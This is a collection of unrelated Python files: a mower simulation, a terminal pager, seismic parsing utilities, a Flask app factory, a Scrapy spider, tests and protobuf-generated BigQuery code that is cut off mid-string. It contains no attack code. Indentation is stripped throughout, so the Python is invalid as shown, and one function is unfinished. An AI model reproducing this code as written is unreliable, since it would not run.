# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
from enum import Enum
class FieldContents(Enum):
Grass = ' #'
Mowed = ' .'
Mower = 'M'
def __str__(self):
return self.value
class Direction:
def __init__(self, index, xOffset, yOffset, symbol):
self.Index = index
self.XOffset = xOffset
self.YOffset = yOffset
self.Symbol = symbol
def move_from(self, location, distance=1):
return Location(location.X + distance * self.XOffset,
location.Y + distance * self.YOffset)
class Directions(Enum):
North = Direction(0, 0, -1, '^')
East = Direction(1, 1, 0, '>')
South = Direction(2, 0, 1, 'v')
West = Direction(3, -1, 0, '<')
@staticmethod
def get_direction_after_turn_left_90_degrees(direction):
newIndex = direction.Index - 1 \
if direction.Index > 0 \
else len(Directions) - 1
newDirection = next(i for i in Directions
if i.value.Index == newIndex)
return newDirection.value
@staticmethod
def get_direction_after_turn_right_90_degrees(direction):
newIndex = direction.Index + 1 \
if direction.Index < len(Directions) - 1 \
else 0
newDirection = next(i for i in Directions
if i.value.Index == newIndex)
return newDirection.value
class Location:
def __init__(self, x, y):
self.X, self.Y = x, y
def move(self, xOffset, yOffset):
return Location(self.X + xOffset,
self.Y + yOffset)
class Mower:
def __init__(self, location, direction):
self.Location = location
self.Direction = direction
self.StepCount = 0
def turn_left(self):
self.StepCount += 1
self.Direction = Directions\
.get_direction_after_turn_left_90_degrees(self.Direction)
def mow(self, field):
newLocation = self.Direction.move_from(self.Location)
newLocation, isValid = field.fix_location(newLocation)
if isValid:
self.Location = newLocation
self.StepCount += 1
field.set(self.Location, self.StepCount
if self.StepCount > 9
else " {}".format(self.StepCount))
def jump(self, field, forward, right):
newLocation = self.Direction.move_from(self.Location, forward)
rightDirection = Directions\
.get_direction_after_turn_right_90_degrees(self.Direction)
newLocation = rightDirection.move_from(newLocation, right)
newLocation, isValid = field.fix_location(newLocation)
if isValid:
self.Location = newLocation
self.StepCount += 1
field.set(self.Location, self.StepCount
if self.StepCount > 9
else " {}".format(self.StepCount))
class Field:
def __init__(self, width, height, initialContent):
self.Field = [[initialContent] * width for _ in range(height)]
self.Width = width
self.Height = height
def set(self, location, symbol):
self.Field[location.Y][location.X] = symbol
def count_mowed(self):
return sum(1 for row in range(self.Height)
for column in range(self.Width)
if self.Field[row][column] != FieldContents.Grass)
def display(self, mower):
for rowIndex in range(self.Height):
if rowIndex != mower.Location.Y:
row = ' '.join(map(str, self.Field[rowIndex]))
else:
r = self.Field[rowIndex][:]
r[mower.Location.X] = "{}{}".format(
FieldContents.Mower, mower.Direction.Symbol)
row = ' '.join(map(str, r))
print(row)
class ValidatingField(Field):
def __init__(self, width, height, initialContent):
super().__init__(width, height, initialContent)
def fix_location(self, location):
if location.X >= self.Width or \
location.X < 0 or \
location.Y >= self.Height or \
location.Y < 0:
return None, False
return location, True
class ToroidField(Field):
def __init__(self, width, height, initialContent):
super().__init__(width, height, initialContent)
def fix_location(self, location):
newLocation = Location(location.X, location.Y)
if newLocation.X < 0:
newLocation.X += self.Width
elif newLocation.X >= self.Width:
newLocation.X %= self.Width
if newLocation.Y < 0:
newLocation.Y += self.Height
elif newLocation.Y >= self.Height:
newLocation.Y %= self.Height
return newLocation, True
|
import sys
from . import more_plugins
from .buffered_input import BufferedInput
from .page_builder import PageBuilder, StopOutput
from .page_of_height import PageOfHeight
from .page_wrapper import PageWrapper
from .terminal_input import TerminalInput
from .terminal_screen import TerminalScreen
def MorePageBuilder(*args, **kwargs):
'''
A PageBuilder that is intended to work closely the way 'more' works.
It supports the basic 'more' actions (one-more-page, n-more-lines, find-text).
Extra actions can be installed as plugins, see more_plugins.py
Constructor Arguments:
----------------------
input: [type Input]
If not specified we read input from stdin
output: [type Output]
If not specified we print output to stdout
screen_dimensions: [type ScreenDimensions]
If not specified we use the dimensions of the terminal window
plugins: [type list of MorePlugin]
The plugins to load. If not specified will fetch all plugins from more_plugins.py
'''
return PageWrapper(_MorePageBuilder(*args, **kwargs))
class _MorePageBuilder(PageBuilder):
def __init__(self, input=None, output=None, screen_dimensions=None, plugins=None):
self._screen_dimensions = screen_dimensions or TerminalScreen()
self._output = output or sys.stdout
self._input = BufferedInput(input or TerminalInput())
self._plugins = plugins or more_plugins.get()
self._action_handlers = _build_plugins_dictionary(self._plugins)
def build_first_page(self):
return PageOfHeight(height=self.get_page_height(), output=self._output)
def build_next_page(self, message=None, arguments=None):
try:
return self._try_to_build_next_page(
message or self.get_prompt_message(),
arguments or {}
)
except KeyboardInterrupt:
# Stop output on ctrl-c
raise StopOutput
def _try_to_build_next_page(self, message, arguments):
while True:
key_pressed = self._input.get_character(message)
if key_pressed in self._action_handlers:
handler = self._action_handlers[key_pressed]
return handler.build_page(self, key_pressed=key_pressed, arguments=arguments)
def get_plugins(self):
return self._plugins
def get_page_height(self):
height_reserved_for_more_prompt = 1
return self._screen_dimensions.get_height() - height_reserved_for_more_prompt
def get_output(self):
return self._output
def get_input(self):
''' Returns the BufferedInput object used to get the user input '''
return self._input
def get_prompt_message(self):
return '--More--'
def _build_plugins_dictionary(plugins):
return {
key: plugin
for plugin in plugins
for key in plugin.get_keys()
}
|
import random
def compute_gems(points, num_gems):
gems = []
# For each requested gem, fetch a pair of adjacent points from points list and place a gem randomly between them
start_indices = random.sample(range(0, len(points)-1), int(num_gems))
start_indices.sort() # Ensure all gems are in strictly increasing position along the path
for start_index in start_indices:
# Find two points between which to place the gem
start = points[start_index]
finish = points[start_index+1]
# Pick the point of the gem
lat_diff = finish['lat'] - start['lat']
lng_diff = finish['lng'] - start['lng']
interspace_position = random.random() # Pick the gem position 0-1, 0 being start and 1 being finish
gem_pos = {
'lat': start['lat'] + lat_diff * interspace_position,
'lng': start['lng'] + lng_diff * interspace_position
}
# Add gem to the gems list
gems.append(gem_pos)
return gems
|
from setuptools import setup, find_packages
# from setuptools.command.install import install as _install
#
#
# class Install(_install):
# def run(self):
# _install.do_egg_install(self)
# import nltk
# nltk.download('stopwords')
# nltk.download('punkt')
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setup(
# cmdclass={'install': Install},
name="text-based-clusterer",
version="0.0.2",
author="Benedict Taguinod",
author_email="benedict.a.taguinod@gmail.com",
description="A package that clusters python objects based on a chosen string attribute",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/btaguinod/text-based-clusterer",
project_urls={
"Bug Tracker": "https://github.com/btaguinod/text-based-clusterer/issues",
},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
package_dir={"": "src"},
packages=find_packages(where="src"),
python_requires=">=3.6",
install_requires=['numpy', 'nltk'],
)
|
#! usr/bin/python3.6
"""
Module initially auto generated using V5Automation files from CATIA V5 R28 on 2020-07-06 14:02:20.222384
.. warning::
The notes denoted "CAA V5 Visual Basic Help" are to be used as reference only.
They are there as a guide as to how the visual basic / catscript functions work
and thus help debugging in pycatia.
"""
from pycatia.in_interfaces.reference import Reference
from pycatia.mec_mod_interfaces.hybrid_shape import HybridShape
class HybridShapeWrapSurface(HybridShape):
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| System.IUnknown
| System.IDispatch
| System.CATBaseUnknown
| System.CATBaseDispatch
| System.AnyObject
| MecModInterfaces.HybridShape
| HybridShapeWrapSurface
|
| Represents the hybrid shape wrap surface object.
| Role: To access the data of the hybrid shape wrap surface
| object.
|
| This data includes:
|
| Two definition surfaces (refrence and target), who define the
| deformation
|
| Use the CATIAHybridShapeFactory to create a HybridShapeWrapSurface
| object.
|
| See also:
| HybridShapeFactory
"""
def __init__(self, com_object):
super().__init__(com_object)
self.hybrid_shape_wrap_surface = com_object
@property
def deformation_mode(self) -> int:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property DeformationMode() As long
|
| Returns or sets whether the wrap surface is or should be created as
| a"Normal" or with a "3D" deformation mode.
| Legal values: 2 for the normal solution and 1 for 3D
| solution.
|
| Example:
|
| This example sets the mode to create the wrap
| surface
| hybWrapSurface with a 3D deformation mode.
|
|
| hybWrapSurface.3D deformation mode = 1
:return: int
:rtype: int
"""
return self.hybrid_shape_wrap_surface.DeformationMode
@deformation_mode.setter
def deformation_mode(self, value: int):
"""
:param int value:
"""
self.hybrid_shape_wrap_surface.DeformationMode = value
@property
def reference_surface(self) -> Reference:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property ReferenceSurface() As Reference
|
| Returns or sets the reference surface of the WrapSurface.
|
| Example:
| This example retrieves in ReferenceSurface the surface to deform of the
| ShpWrapSurface hybrid shape WrapSurface feature.
|
| ReferenceSurface = ShpWrapSurface.Surface
:return: Reference
:rtype: Reference
"""
return Reference(self.hybrid_shape_wrap_surface.ReferenceSurface)
@reference_surface.setter
def reference_surface(self, reference_surface: Reference):
"""
:param Reference reference_surface:
"""
self.hybrid_shape_wrap_surface.ReferenceSurface = reference_surface.com_object
@property
def surface(self) -> Reference:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property Surface() As Reference
|
| Returns or sets the reference surface to deform of the WrapSurface.
|
|
| Example:
| This example retrieves in SurfaceToDeform the surface to deform of the
| ShpWrapSurface hybrid shape WrapSurface feature.
|
| SurfaceToDeform = ShpWrapSurface.Surface
:return: Reference
:rtype: Reference
"""
return Reference(self.hybrid_shape_wrap_surface.Surface)
@surface.setter
def surface(self, reference_surface: Reference):
"""
:param Reference reference_surface:
"""
self.hybrid_shape_wrap_surface.Surface = reference_surface.com_object
@property
def target_surface(self) -> Reference:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property TargetSurface() As Reference
|
| Returns or sets the target surface of the WrapSurface.
|
| Example:
| This example retrieves in TargetSurface the surface to deform of the
| ShpWrapSurface hybrid shape WrapSurface feature.
|
| TargetSurface = ShpWrapSurface.Surface
:return: Reference
:rtype: Reference
"""
return Reference(self.hybrid_shape_wrap_surface.TargetSurface)
@target_surface.setter
def target_surface(self, reference_surface: Reference):
"""
:param Reference reference_surface:
"""
self.hybrid_shape_wrap_surface.TargetSurface = reference_surface.com_object
def __repr__(self):
return f'HybridShapeWrapSurface(name="{self.name}")'
|
#Area of Triangle
#Asking for Breadth(b) and Height(h) of triangle.
b = float(input("Enter the breadth of the triangle = "))
h = float(input("Enter the height of the triangle = "))
print('Area of triangle = ', h * b / 2," sq.m ")
|
import random
import time
import snakefish
channel = snakefish.Channel() # create a channel
# a function that will be executed on a snakefish thread
def f1() -> None:
if random.random() < 0.5:
print("thread #1: sleep for 100 ms")
time.sleep(0.1)
ts = snakefish.get_timestamp_serialized()
print("thread #1: sending an event...")
channel.send_pyobj((ts, "explosion"))
# a function that will be executed on a snakefish thread
def f2() -> None:
ts = snakefish.get_timestamp_serialized()
print("thread #2: sending an event...")
channel.send_pyobj((ts, "implosion"))
# a function that will be executed on a snakefish thread
def f3() -> None:
# blocking receive
print("thread #3: receiving an object...")
received1 = channel.receive_pyobj(True)
# blocking receive
print("thread #3: receiving an object...")
received2 = channel.receive_pyobj(True)
print("thread #3: timestamps are %s and %s" % (received1[0], received2[0]))
if received1[0] <= received2[0]:
print("thread #3: %s occurred before %s" % (received1[1], received2[1]))
else:
print("thread #3: %s occurred before %s" % (received2[1], received1[1]))
# spawn 3 snakefish threads
t1 = snakefish.Thread(f1)
t2 = snakefish.Thread(f2)
t3 = snakefish.Thread(f3)
t1.start()
t2.start()
t3.start()
# join the threads and check exit status
t1.join()
assert (t1.get_exit_status() == 0)
print("thread #1 exit status:", t1.get_exit_status())
print("result of f1():", t1.get_result())
t2.join()
assert (t2.get_exit_status() == 0)
print("thread #2 exit status:", t2.get_exit_status())
print("result of f2():", t2.get_result())
t3.join()
assert (t3.get_exit_status() == 0)
print("thread #3 exit status:", t3.get_exit_status())
print("result of f3():", t3.get_result())
# release resources
channel.dispose()
t1.dispose()
t2.dispose()
t3.dispose()
|
# fill this in with the common functions so i can clean up my shitty code
import json
import pandas as pd
import datetime
import math
from pathlib import Path
import numpy as np
def csv_naive_filter(csv_path, list_of_timestamps):
df = pd.read_csv(csv_path)
df["event_ts"] = pd.to_datetime(df["event_start_time"])
for index, row in df.iterrows():
df.at[index, "keep"] = "{}.{}".format(row["station"], datetime.datetime.strftime(row["event_ts"], "%Y.%j.%H%M%S")) in list_of_timestamps
df = df[df.keep == True]
return df
def csv_indexed_filter(csv_path, list_of_timestamps):
df = pd.read_csv(csv_path)
df["event_ts"] = pd.to_datetime(df["event_start_time"])
for index, row in df.iterrows():
test_str = "{}.{}".format(row["station"], datetime.datetime.strftime(row["event_ts"], "%Y.%j.%H%M%S"))
df.at[index, "keep"] = test_str in list_of_timestamps
try:
_manualindex = int(list_of_timestamps.index(test_str))
df.at[index, "input_index"] = _manualindex
except:
df.at[index, "input_index"] = None
df = df[df.keep == True]
return df
def centre_bin(bins):
return (bins[1:] + bins[:-1])/2
def match_gradings(df, grade_tracename, grades):
"""
Given a txt file in manual (giving the grades for each trace as identified in its file name),
and a data file, match each grade to the waveform in the pd df
:param df: filtered pandas dataframe
:type df: { type_description }
:param grade_tracename: A list of grades and tracenames, taken from the manual folder
:type grade_tracename: { type_description }
:param grades: The grades
:type grades: { type_description }
"""
for c, tn in enumerate(grade_tracename):
tn = ".".join(tn.split(".")[1:])
_dfindex = df[df.ts_str == tn].index.values[0]
df.at[_dfindex, "grade"] = grades[c].upper()
return df
def load_graded_from_file_structure(sac_folder, csv_file):
# returns matched df (with the file structure) + puts their grade there
grades = []
filenames = []
for p in Path(sac_folder).rglob("*png"):
_p = str(p)
_grade = _p.split("/")[-2]
grades.append(_grade)
filenames.append(".".join(_p.split("/")[-1].split(".")[:-1])) # get the filename without the extension
# there is defn a better way to do this
#print(filenames)
df = csv_indexed_filter(csv_file, filenames)
for index, row in df.iterrows():
df.at[index, "grade"] = grades[int(row["input_index"])]
return df
def load_from_grades(known_picks):
"""
returns a tuple of (a list of tracenames (the timestamp), and the grade).
this should be depreciated in favour of reading directly from the sac_picks folder as a source of picks
:param known_picks: The known picks
:type known_picks: { type_description }
"""
graded_traces = []
grades = []
with open(known_picks, "r") as f:
for line in f:
_x = line.strip().split(",")
graded_traces.append(_x[0])
grades.append(_x[1])
return (graded_traces, grades)
def load_with_path_and_grade(csv_file, source_folder):
sac_pathname = [str(path) for path in Path(source_folder).rglob('*.png')]
sac_tracename = [x.split("/")[-1].split(".png")[0] for x in sac_pathname]
folder_df = pd.DataFrame(np.column_stack([sac_pathname, sac_tracename]), columns = ["pathname", "wf"])
for index, row in folder_df.iterrows():
folder_df.at[index, 'grade'] = row.pathname.split("/")[-2]
# load the csv file, make a new column for file name, do pd.merge to match the two of the
csv_df = pd.read_csv(csv_file)
csv_df['event_dt'] = pd.to_datetime(csv_df.event_start_time)
for index, row in csv_df.iterrows():
csv_df.at[index, 'wf'] = "{}.{}".format(row.station, datetime.datetime.strftime(row.event_dt, "%Y.%j.%H%M%S"))
#print(csv_df)
new_df = csv_df.merge(folder_df, on = "wf")
return new_df
def parse_xy_lines(input_file):
all_lines = []
b_c = 0 # bracket counter
_line = []
with open(input_file, 'r') as f:
for line in f:
if ">" in line.strip():
b_c += 1
if len(_line) > 0:
all_lines.append(_line)
_line = []
continue
if b_c % 2:
#print(line.strip().split(" "))
try:
_lon, _lat = line.strip().split(" ")
except:
_lon, _lat = line.strip().split("\t")
_line.append((float(_lon), float(_lat)))
return all_lines
def parse_station_info(input_file):
# 'reusing functions is bad practice' yes haha
station_info = {}
with open(input_file, 'r') as f:
for line in f:
#print(line)
try:
data = [x for x in line.strip().split("\t") if x != ""]
except:
data = [x for x in line.strip().split(" ") if x != ""]
sta = data[0]
lon = data[1]
lat = data[2]
station_info[sta] = {"lon": float(lon), "lat": float(lat)}
if len(data) == 4:
elv = data[3]
station_info[sta]["elv"] = float(elv)
return station_info
def parse_event_coord(file_name, _format):
event_info = {}
# uid : {"lon", "lat", "depth"}
if _format == "real_hypophase":
with open(file_name, 'r') as f:
for line in f:
line = [x for x in line.strip().split(" ") if x != ""]
if line[0] == "#":
#print(line)
_lon = float(line[8])
_lat = float(line[7])
_depth = float(line[9])
_id = (line[-1])
event_info[_id] = {
"lat": _lat,
"lon": _lon,
"dep": _depth
}
elif _format == "hypoDD_loc": # any .loc or .reloc file
with open(file_name, 'r') as f:
for line in f:
line = [x for x in line.strip().split(" ") if x != ""]
_id = str(line[0]).zfill(6)
event_info[_id] = {
"lat":float(line[1]),
"lon":float(line[2]),
"dep":float(line[3])
}
elif _format == "event_csv":
df = pd.read_csv(file_name)
for index, row in df.iterrows():
for _i in ["ID", "id", "cat_index"]:
if _i in df.columns:
_id = str(int(row[_i])).zfill(6)
event_info[_id] = {}
break
for _i in ["lat", "LAT", "event_lat", "ev_lat"]:
if _i in df.columns:
event_info[_id]["lat"] = row[_i]
break
for _i in ["lon", "LON", "event_lon", "ev_lon"]:
if _i in df.columns:
event_info[_id]["lon"] = row[_i]
break
for _i in ["DEPTH", "depth", "dep", "DEP", "event_depth", "event_dep"]:
if _i in df.columns:
event_info[_id]["dep"] = row[_i]
break
else:
raise ValueError("Format {} not supported, please consult the wiki".format(_format))
return event_info
def split_csv(input_csv, output_csv_root, N = 4):
df = pd.read_csv(input_csv)
remainder = len(df) % 4
n_rows_per_file = len(df) // 4
if __name__ == "__main__":
pass
|
# -*- coding: utf-8 -*-
import os
from flask import Flask, render_template
from flask_cors import CORS
from polylogyx.api.api import blueprint as api
from polylogyx.celery.tasks import celery
from polylogyx.extensions import (
cache,
csrf,
db,
log_tee,
mail,
make_celery,
migrate,
rule_manager,
threat_intel
)
from polylogyx.settings import ProdConfig
def create_app(config=ProdConfig):
app = Flask(__name__)
CORS(app)
app.config.from_object(config)
app.config.from_envvar("POLYLOGYX_SETTINGS", silent=True)
register_blueprints(app)
register_loggers(app)
register_extensions(app)
return app
def register_blueprints(app):
app.register_blueprint(api)
csrf.exempt(api)
def register_extensions(app):
csrf.init_app(app)
db.init_app(app)
migrate.init_app(app, db)
log_tee.init_app(app)
rule_manager.init_app(app)
threat_intel.init_app(app)
mail.init_app(app)
make_celery(app, celery)
cache.init_app(app)
def register_loggers(app):
import logging
import sys
from logging.handlers import RotatingFileHandler,TimedRotatingFileHandler
import pathlib
from datetime import datetime
logfile = app.config["POLYLOGYX_LOGGING_FILENAME"]
if logfile == "-":
handler = logging.StreamHandler(sys.stdout)
else:
log_dir = pathlib.Path(app.config['POLYLOGYX_LOGGING_DIR'])
logfile = log_dir.joinpath(logfile)
max_size = app.config["POLYLOGYX_LOGFILE_SIZE"]
backup_cnt = app.config["POLYLOGYX_LOGFILE_BACKUP_COUNT"]
handler = RotatingFileHandler(logfile, maxBytes=max_size, backupCount=backup_cnt)
#handler = TimedRotatingFileHandler(logfile,"midnight",1,10,'utf-8')
namer = lambda fn : str(fn).split(".")[0]+"_"+ datetime.now().strftime("%Y-%m-%d_%H-%M")
handler.namer=namer
level_name = app.config["POLYLOGYX_LOGGING_LEVEL"]
if level_name in ("DEBUG", "INFO", "WARN", "WARNING", "ERROR", "CRITICAL"):
app.logger.setLevel(getattr(logging, level_name))
formatter = logging.Formatter(app.config["POLYLOGYX_LOGGING_FORMAT"])
handler.setFormatter(formatter)
app.logger.addHandler(handler)
|
import scrapy
class DocSectionItem(scrapy.Item):
title = scrapy.Field()
company = scrapy.Field()
location = scrapy.Field()
class MySpider(scrapy.Spider):
name = 'myspider'
start_urls = ['https://stackoverflow.com/jobs?med=site-ui&ref=jobs-tab']
def parse(self, response):
for a_el in response.css('div#mainbar div.listResults div.-job-summary'):
section = DocSectionItem()
section['title'] = a_el.css('div.-title a::text').extract()[0]
section['company'] = a_el.css('span:not(.fc-black-500)::text').extract()[2].strip().replace('\r\n','')
section['location'] = a_el.css('span.fc-black-500::text').extract()[1].strip().replace('- \r\n','')
yield section
next_page = response.css('div#mainbar div.pagination a.prev-next.job-link.test-pagination-next::attr(href)')[0]
if next_page is not None:
next_page = response.urljoin(next_page.extract())
yield scrapy.Request(next_page, callback = self.parse)
|
from copy import deepcopy
from json import dumps, loads
def test_ffflash_save(tmpdir, fffake):
apifile = tmpdir.join('phony_api_file.json')
apifile.write_text(dumps({'a': 'b'}), 'utf-8')
assert tmpdir.listdir() == [apifile]
f = fffake(apifile, dry=True)
assert f
assert f.args.APIfile == str(apifile)
assert f.location == str(apifile)
assert f.api is not None
old_c = deepcopy(f.api.c)
assert f.api.push('c', 'a') is None
assert loads(f.save()) == f.api.c
assert f.api.c != old_c
assert loads(apifile.read_text('utf-8')) == {'a': 'c'}
assert tmpdir.remove() is None
def test_ffflash_save_check_timestamp(tmpdir, fffake):
apifile = tmpdir.join('phony_api_file.json')
apifile.write_text(dumps({'state': {'lastchange': 'never'}}), 'utf-8')
assert tmpdir.listdir() == [apifile]
f = fffake(apifile, dry=True)
assert f
assert f.api is not None
old_t = f.api.pull('state', 'lastchange')
assert loads(f.save()) == f.api.c
new_t = f.api.pull('state', 'lastchange')
assert old_t != new_t
assert loads(
apifile.read_text('utf-8')
) == {'state': {'lastchange': new_t}}
assert tmpdir.remove() is None
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/bigquery_v2/proto/model.proto
import sys
_b = sys.version_info[0] < 3 and (lambda x: x) or (lambda x: x.encode("latin1"))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.cloud.bigquery_v2.proto import (
model_reference_pb2 as google_dot_cloud_dot_bigquery__v2_dot_proto_dot_model__reference__pb2,
)
from google.cloud.bigquery_v2.proto import (
standard_sql_pb2 as google_dot_cloud_dot_bigquery__v2_dot_proto_dot_standard__sql__pb2,
)
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from google.protobuf import timestamp_pb2 as google_dot_protobuf_dot_timestamp__pb2
from google.protobuf import wrappers_pb2 as google_dot_protobuf_dot_wrappers__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from google.api import client_pb2 as google_dot_api_dot_client__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name="google/cloud/bigquery_v2/proto/model.proto",
package="google.cloud.bigquery.v2",
syntax="proto3",
serialized_options=_b(
"\n\034com.google.cloud.bigquery.v2B\nModelProtoZ@google.golang.org/genproto/googleapis/cloud/bigquery/v2;bigquery"
),
serialized_pb=_b(
'\n*google/cloud/bigquery_v2/proto/model.proto\x12\x18google.cloud.bigquery.v2\x1a\x34google/cloud/bigquery_v2/proto/model_reference.proto\x1a\x31google/cloud/bigquery_v2/proto/standard_sql.proto\x1a\x1bgoogle/protobuf/empty.proto\x1a\x1fgoogle/protobuf/timestamp.proto\x1a\x1egoogle/protobuf/wrappers.proto\x1a\x1cgoogle/api/annotations.proto\x1a\x17google/api/client.proto"\xc4,\n\x05Model\x12\x0c\n\x04\x65tag\x18\x01 \x01(\t\x12\x41\n\x0fmodel_reference\x18\x02 \x01(\x0b\x32(.google.cloud.bigquery.v2.ModelReference\x12\x15\n\rcreation_time\x18\x05 \x01(\x03\x12\x1a\n\x12last_modified_time\x18\x06 \x01(\x03\x12\x13\n\x0b\x64\x65scription\x18\x0c \x01(\t\x12\x15\n\rfriendly_name\x18\x0e \x01(\t\x12;\n\x06labels\x18\x0f \x03(\x0b\x32+.google.cloud.bigquery.v2.Model.LabelsEntry\x12\x17\n\x0f\x65xpiration_time\x18\x10 \x01(\x03\x12\x10\n\x08location\x18\r \x01(\t\x12=\n\nmodel_type\x18\x07 \x01(\x0e\x32).google.cloud.bigquery.v2.Model.ModelType\x12\x42\n\rtraining_runs\x18\t \x03(\x0b\x32+.google.cloud.bigquery.v2.Model.TrainingRun\x12\x43\n\x0f\x66\x65\x61ture_columns\x18\n \x03(\x0b\x32*.google.cloud.bigquery.v2.StandardSqlField\x12\x41\n\rlabel_columns\x18\x0b \x03(\x0b\x32*.google.cloud.bigquery.v2.StandardSqlField\x1a\xb4\x02\n\x11RegressionMetrics\x12\x39\n\x13mean_absolute_error\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x38\n\x12mean_squared_error\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12<\n\x16mean_squared_log_error\x18\x03 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12;\n\x15median_absolute_error\x18\x04 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12/\n\tr_squared\x18\x05 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x1a\xef\x02\n\x1e\x41ggregateClassificationMetrics\x12/\n\tprecision\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12,\n\x06recall\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12.\n\x08\x61\x63\x63uracy\x18\x03 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12/\n\tthreshold\x18\x04 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12.\n\x08\x66\x31_score\x18\x05 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12.\n\x08log_loss\x18\x06 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12-\n\x07roc_auc\x18\x07 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x1a\x9f\x06\n\x1b\x42inaryClassificationMetrics\x12h\n aggregate_classification_metrics\x18\x01 \x01(\x0b\x32>.google.cloud.bigquery.v2.Model.AggregateClassificationMetrics\x12w\n\x1c\x62inary_confusion_matrix_list\x18\x02 \x03(\x0b\x32Q.google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix\x12\x16\n\x0epositive_label\x18\x03 \x01(\t\x12\x16\n\x0enegative_label\x18\x04 \x01(\t\x1a\xec\x03\n\x15\x42inaryConfusionMatrix\x12>\n\x18positive_class_threshold\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x33\n\x0etrue_positives\x18\x02 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x34\n\x0f\x66\x61lse_positives\x18\x03 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x33\n\x0etrue_negatives\x18\x04 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x34\n\x0f\x66\x61lse_negatives\x18\x05 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12/\n\tprecision\x18\x06 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12,\n\x06recall\x18\x07 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12.\n\x08\x66\x31_score\x18\x08 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12.\n\x08\x61\x63\x63uracy\x18\t \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x1a\x87\x05\n\x1fMultiClassClassificationMetrics\x12h\n aggregate_classification_metrics\x18\x01 \x01(\x0b\x32>.google.cloud.bigquery.v2.Model.AggregateClassificationMetrics\x12n\n\x15\x63onfusion_matrix_list\x18\x02 \x03(\x0b\x32O.google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix\x1a\x89\x03\n\x0f\x43onfusionMatrix\x12:\n\x14\x63onfidence_threshold\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x61\n\x04rows\x18\x02 \x03(\x0b\x32S.google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.Row\x1aQ\n\x05\x45ntry\x12\x17\n\x0fpredicted_label\x18\x01 \x01(\t\x12/\n\nitem_count\x18\x02 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x1a\x83\x01\n\x03Row\x12\x14\n\x0c\x61\x63tual_label\x18\x01 \x01(\t\x12\x66\n\x07\x65ntries\x18\x02 \x03(\x0b\x32U.google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.Entry\x1a\x8c\x01\n\x11\x43lusteringMetrics\x12:\n\x14\x64\x61vies_bouldin_index\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12;\n\x15mean_squared_distance\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x1a\x95\x03\n\x11\x45valuationMetrics\x12O\n\x12regression_metrics\x18\x01 \x01(\x0b\x32\x31.google.cloud.bigquery.v2.Model.RegressionMetricsH\x00\x12\x64\n\x1d\x62inary_classification_metrics\x18\x02 \x01(\x0b\x32;.google.cloud.bigquery.v2.Model.BinaryClassificationMetricsH\x00\x12m\n"multi_class_classification_metrics\x18\x03 \x01(\x0b\x32?.google.cloud.bigquery.v2.Model.MultiClassClassificationMetricsH\x00\x12O\n\x12\x63lustering_metrics\x18\x04 \x01(\x0b\x32\x31.google.cloud.bigquery.v2.Model.ClusteringMetricsH\x00\x42\t\n\x07metrics\x1a\x97\x0e\n\x0bTrainingRun\x12U\n\x10training_options\x18\x01 \x01(\x0b\x32;.google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions\x12.\n\nstart_time\x18\x08 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12L\n\x07results\x18\x06 \x03(\x0b\x32;.google.cloud.bigquery.v2.Model.TrainingRun.IterationResult\x12M\n\x12\x65valuation_metrics\x18\x07 \x01(\x0b\x32\x31.google.cloud.bigquery.v2.Model.EvaluationMetrics\x1a\x89\x08\n\x0fTrainingOptions\x12\x16\n\x0emax_iterations\x18\x01 